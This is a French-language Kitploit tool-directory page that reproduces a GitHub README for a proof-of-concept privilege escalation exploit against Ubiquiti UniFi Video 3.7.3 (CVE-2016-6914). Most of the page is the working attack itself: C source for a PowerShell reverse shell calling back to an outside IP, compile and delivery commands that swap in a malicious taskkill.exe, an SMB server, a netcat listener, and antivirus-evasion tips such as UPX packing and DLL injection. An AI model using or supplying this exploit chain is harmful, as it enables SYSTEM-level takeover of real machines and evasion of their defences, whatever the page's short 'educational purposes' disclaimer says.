Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2016-6914-UniFiVideo-LPE — CVE-2016-6914-UniFiVideo-LPE | Kitploit
Outils/GitHubGitHub/cybermonkx/cve-2016-6914-unifivideo-lpe
Escalade de PrivilègesExploitationTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges UtilesExploitation de Binaires
GitHubcybermonkx/cve-2016-6914-unifivideo-lpe

CVE-2016-6914-UniFiVideo-LPE

CVE-2016-6914-UniFiVideo-LPE

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
2il y a 1 anPas encore vérifié

CVE-2016-6914 - PoC d'élévation de privilèges locaux (LPE) pour Ubiquiti UniFi Video 3.7.3

🔥 Présentation

Ce dépôt contient une preuve de concept (PoC) pour CVE-2016-6914, une vulnérabilité d'élévation de privilèges locaux (LPE) affectant Ubiquiti UniFi Video 3.7.3.

Un attaquant disposant de privilèges limités peut remplacer un binaire de confiance (taskkill.exe) dans C:\ProgramData\unifi-video\ afin d'exécuter du code malveillant avec les privilèges SYSTEM.


⚡ Exploitation

Étapes d'exploitation

1️⃣ Remplacez taskkill.exe par une charge utile malveillante (exploit.exe).
2️⃣ Attendez que le service UniFi Video s'exécute ou redémarrez-le manuellement.
3️⃣ La charge utile malveillante s'exécute, ce qui fournit un shell SYSTEM.


🚀 Charges utiles incluses

  • ✅ Reverse Shell PowerShell
  • ✅ Reverse Shell Netcat
  • ✅ Techniques de contournement de l'antivirus

📜 Code du PoC (Reverse Shell PowerShell)

Cette charge utile remplace taskkill.exe et lance un reverse shell.

root@kitploit:~
#include <windows.h>

int main() {
    system("powershell -NoP -W Hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"");
    return 0;
}

✅ Compilez avec MinGW :

root@kitploit:~
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe

🛠️ Instructions d'utilisation

1️⃣ Configurer le partage SMB (pour la livraison de fichiers à distance)

Sur Kali, exécutez :

root@kitploit:~
impacket-smbserver share . -smb2support

2️⃣ Démarrer un listener Netcat

root@kitploit:~
nc -lvnp 4444

3️⃣ Livrer la charge utile à la machine cible

Exécutez les commandes PowerShell suivantes sur le système cible :

root@kitploit:~
copy \\10.10.14.5\share\taskkill.exe C:\ProgramData\unifi-video\taskkill.exe
stop-service UnifiVideoService -Force
start-service UnifiVideoService

4️⃣ Obtenir un shell SYSTEM

Une fois exécutée, un shell SYSTEM s'ouvre sur votre listener !

🛡️ Contourner l'antivirus (AV)

Pour contourner la détection antivirus de base, essayez : ✔️ Empaqueter l'exécutable (UPX) :

root@kitploit:~
upx --best --lzma exploit.exe

✔️ Utiliser des syscalls alternatifs au lieu de system(). ✔️ Intégration dans des processus légitimes via une injection DLL.

⚠️ Avertissement

📢 Ce PoC est uniquement à des fins éducatives ! 🛑 Toute utilisation non autorisée est illégale et punissable. 👨‍💻 Utilisez-le uniquement de manière légale et éthique.

Référence : https://www.exploit-db.com/exploits/43390

Télécharger l’outil